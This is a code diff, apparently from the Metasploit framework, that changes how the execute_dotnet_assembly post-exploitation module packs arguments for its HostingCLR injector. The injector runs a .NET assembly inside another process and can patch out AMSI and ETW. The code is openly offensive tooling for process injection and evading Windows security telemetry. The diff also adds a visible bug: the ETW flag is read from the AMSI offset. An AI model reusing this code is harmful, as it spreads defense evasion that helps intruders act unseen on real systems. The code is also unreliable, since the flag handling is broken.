Adjust how HostingCLR arguments are packed

data/post/execute-dotnet-assembly/.gitignore

@@ -0,0 +1,2 @@
+HostingCLR*
+!HostCLR*.dll

external/source/HostingCLR_inject/.gitignore

@@ -0,0 +1,2 @@
+HostingCLR/Release/*
+HostingCLR/x64/*

external/source/HostingCLR_inject/HostingCLR/HostingCLR.cpp

@@ -19,8 +19,8 @@
 #define MethodJittingStarted 145
 #define ILStubGenerated 88
 
-unsigned char amsiflag[1];
+bool amsiflag;
-unsigned char etwflag[1];
+bool etwflag;
 unsigned char signflag[1];
 
 char sig_40[] = { 0x76,0x34,0x2E,0x30,0x2E,0x33,0x30,0x33,0x31,0x39 };
@@ -113,11 +113,11 @@ int executeSharp(LPVOID lpPayload)
 	//Taking pointer to amsi
 	unsigned char *offsetamsi = allData + 8;
 	//Store amsi flag 
-	memcpy(amsiflag, offsetamsi, 1);
+	amsiflag = (offsetamsi[0] != 0);
 
 	unsigned char *offsetetw = allData + 9;
-	//Store amsi flag 
+	//Store etw flag 
-	memcpy(etwflag, offsetetw, 1);
+	etwflag = (offsetamsi[0] != 0);
 
 	unsigned char *offsetsign = allData + 10;
 	//Store sihnature flag 
@@ -153,7 +153,7 @@ int executeSharp(LPVOID lpPayload)
 	}
 
 	//Etw bypass
-	if (etwflag[0] == '\x01')
+	if (etwflag)
 	{
 		int ptcResult = PatchEtw();
 		if (ptcResult == -1)
@@ -238,7 +238,7 @@ int executeSharp(LPVOID lpPayload)
 	}
 
 	//Amsi bypass
-	if (amsiflag[0] == '\x01')
+	if (amsiflag)
 	{
 		int ptcResult = PatchAmsi();
 		if (ptcResult == -1)

modules/post/windows/manage/execute_dotnet_assembly.rb

@@ -13,6 +13,11 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::ReflectiveDLLInjection
   include Msf::Post::Windows::Dotnet
 
+  SIGNATURES = {
+    'Main()' => 1,
+    'Main(string[])' => 2
+  }.freeze
+
   def initialize(info = {})
     super(
       update_info(
@@ -38,7 +43,7 @@ class MetasploitModule < Msf::Post
       [
         OptPath.new('DOTNET_EXE', [true, 'Assembly file name']),
         OptString.new('ARGUMENTS', [false, 'Command line arguments']),
-        OptEnum.new('Signature', [true, 'The Main function signature', 'Automatic', ['Automatic', 'Main()', 'Main(string[])']]),
+        OptEnum.new('Signature', [true, 'The Main function signature', 'Automatic', ['Automatic'] + SIGNATURES.keys]),
         OptString.new('PROCESS', [false, 'Process to spawn', 'notepad.exe']),
         OptString.new('USETHREADTOKEN', [false, 'Spawn process with thread impersonation', true]),
         OptInt.new('PID', [false, 'Pid  to inject', 0]),
@@ -234,35 +239,25 @@ class MetasploitModule < Msf::Post
     etw_flag_size = 1
     assembly_size = File.size(exe_path)
 
-    cln_params = ""
+    cln_params = ''
-    case datastore['Signature']
+    if datastore['Signature'] == 'Automatic'
-    when 'Automatic'
+      signature = datastore['ARGUMENTS'].blank? ? SIGNATURES['Main()'] : SIGNATURES['Main(string[])']
-      signature = datastore['ARGUMENTS'].blank? ? "\x01" : "\x02"
+    else
-    when 'Main()'
+      signature = SIGNATURES.fetch(datastore['Signature'])
-      signature = "\x01"
-    when 'Main(string[])'
-      signature = "\x02"
-      cln_params << datastore['ARGUMENTS']
     end
+    cln_params << datastore['ARGUMENTS'] if signature == SIGNATURES['Main(string[])']
     cln_params << "\x00"
-    argssize = cln_params.length
 
     payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size
-    payload_size += assembly_size + argssize
+    payload_size += assembly_size + cln_params.length
     assembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE)
-    params = [assembly_size].pack('I*')
+    params = [
-    params += [argssize].pack('I*')
+      assembly_size,
-    if datastore['AMSIBYPASS'] == true
+      cln_params.length,
-      params += "\x01"
+      datastore['AMSIBYPASS'] ? 1 : 0,
-    else
+      datastore['ETWBYPASS'] ? 1 : 0,
-      params += "\x02"
+      signature
-    end
+    ].pack('IICCC')
-    if datastore['ETWBYPASS'] == true
-      params += "\x01"
-    else
-      params += "\x02"
-    end
-    params += signature
     params += cln_params
 
     process.memory.write(assembly_mem, params + File.read(exe_path))